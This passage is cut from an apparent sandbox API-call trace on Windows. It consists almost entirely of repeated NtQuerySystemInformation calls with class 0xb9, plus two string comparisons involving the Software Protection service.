ResultLength=0x0) [0294.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0294.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0294.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0294.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0294.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed08, Length=0x30, ResultLength=0x0) [0294.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x38, ResultLength=0x0) [0294.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea60, Length=0x28, ResultLength=0x0) [0294.373] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0294.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0294.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0294.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0294.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x28, ResultLength=0x0) [0294.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0294.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0294.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7d0, Length=0x20, ResultLength=0x0) [0294.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0294.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0294.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0294.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e890, Length=0x20, ResultLength=0x0) [0294.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e820, Length=0x20, ResultLength=0x0) [0294.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e820, Length=0x20, ResultLength=0x0) [0294.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0294.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0294.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0294.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0294.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0294.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0294.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0294.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0294.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0294.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0294.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0294.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecf0, Length=0x28, ResultLength=0x0) [0294.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0294.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0294.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecd0, Length=0x20, ResultLength=0x0) [0294.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec60, Length=0x20, ResultLength=0x0) [0294.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec60, Length=0x20, ResultLength=0x0) [0294.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb30, Length=0x28, ResultLength=0x0) [0294.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb10, Length=0x20, ResultLength=0x0) [0294.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0294.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0294.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efe0, Length=0x40, ResultLength=0x0) [0294.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0294.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0294.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x30, ResultLength=0x0) [0294.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x30, ResultLength=0x0) [0294.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed68, Length=0x30, ResultLength=0x0) [0294.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecd0, Length=0x38, ResultLength=0x0) [0294.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea90, Length=0x50, ResultLength=0x0) [0294.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea90, Length=0x50, ResultLength=0x0) [0294.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea90, Length=0x50, ResultLength=0x0) [0294.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0294.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0294.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0294.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0294.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0294.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0294.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0294.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0294.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x28, ResultLength=0x0) [0294.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0294.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0294.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e730, Length=0x20, ResultLength=0x0) [0294.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6c0, Length=0x20, ResultLength=0x0) [0294.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6c0, Length=0x20, ResultLength=0x0) [0294.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0294.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0294.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0294.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x30, ResultLength=0x0) [0294.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x30, ResultLength=0x0) [0294.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed68, Length=0x30, ResultLength=0x0) [0294.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecd0, Length=0x38, ResultLength=0x0) [0294.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x50, ResultLength=0x0) [0294.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.548] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0294.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x50, ResultLength=0x0) [0294.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x50, ResultLength=0x0) [0294.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.549] NtQuerySystemInformation (SystemInformationClass=0xb9, 